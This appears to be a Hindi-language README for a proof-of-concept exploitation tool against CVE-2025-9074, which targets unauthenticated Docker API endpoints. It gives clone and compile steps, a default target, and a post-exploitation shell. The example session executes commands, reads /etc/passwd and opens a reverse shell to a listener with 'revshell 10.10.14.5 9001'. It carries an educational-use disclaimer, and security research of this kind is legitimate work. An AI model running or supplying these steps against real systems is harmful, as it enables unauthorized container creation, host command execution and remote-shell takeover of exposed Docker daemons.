Docker API CVE-2025-9074 PoC (प्रमाण-अवधारणा). CVE-2025-9074 के लिए एक उन्नत शोषण ढाँचा, जो अप्रमाणित Docker API एंडपॉइंट्स को लक्षित करता है और इसमें एक एकीकृत इंटरैक्टिव कमांड शेल शामिल है।
CVE-2025-9074 के लिए एक उन्नत शोषण फ्रेमवर्क, जो एकीकृत इंटरैक्टिव कमांड शेल के साथ अप्रमाणित Docker API एंडपॉइंट्स को लक्षित करता है।
यह टूल बिना प्रमाणीकरण के उजागर Docker API इंस्टेंस के शोषण को स्वचालित करता है, जिससे लक्ष्य होस्ट पर पूर्ण कंटेनर निर्माण और कमांड निष्पादन संभव होता है। टूल में सहज पोस्ट-एक्सप्लॉइटेशन संचालन के लिए एक कस्टम इंटरैक्टिव शेल शामिल है।
नोट: यह एक कस्टम PoC कार्यान्वयन है। मैंने CVE-2025-9074 की खोज नहीं की।

स्वचालित भेद्यता पहचान, इमेज पुलिंग, कंटेनर निर्माण और आरंभीकरण

कमांड निष्पादन क्षमताओं वाला पोस्ट-एक्सप्लॉइटेशन शेल
git clone https://github.com/xwpdx0/poc-2025-9074
gcc poc.c -o poc-2025-9074
या आप रिलीज़ से बाइनरी डाउनलोड कर सकते हैं।
./poc-2025-9074
डिफ़ॉल्ट लक्ष्य (127.0.0.1:2375) के विरुद्ध निष्पादित करें:
./poc-2025-9074
एक कस्टम Docker API एंडपॉइंट निर्दिष्ट करें:

सफल शोषण पर, एक इंटरैक्टिव शेल निम्नलिखित कमांड प्रदान करता है:
| कमांड | विवरण |
|---|---|
cmd <command> | कंटेनर के भीतर मनमाने कमांड निष्पादित करें |
revshell <ip> <port> | निर्दिष्ट लिसनर पर रिवर्स शेल तैनात करें |
info | वर्तमान कंटेनर और लक्ष्य जानकारी प्रदर्शित करें |
exit | इंटरैक्टिव सत्र समाप्त करें |
(PoC-CVE-2025-9074)> cmd whoami
(PoC-CVE-2025-9074)> cmd cat /etc/passwd
(PoC-CVE-2025-9074)> cmd ls -la /mnt
(PoC-CVE-2025-9074)> revshell 10.10.14.5 9001
(PoC-CVE-2025-9074)> info
CVE-2025-9074 उन Docker इंस्टेंस को प्रभावित करता है जिनमें उचित प्रमाणीकरण तंत्र के बिना API एंडपॉइंट उजागर होते हैं। यह गलत कॉन्फ़िगरेशन Docker डेमॉन तक अनधिकृत पहुँच की अनुमति देता है, जिससे निम्नलिखित संभव होता है:
यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
xwpd (@xwpdx0)
MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें
जिम्मेदार प्रकटीकरण और सुरक्षा अनुसंधान उद्देश्यों के लिए ही।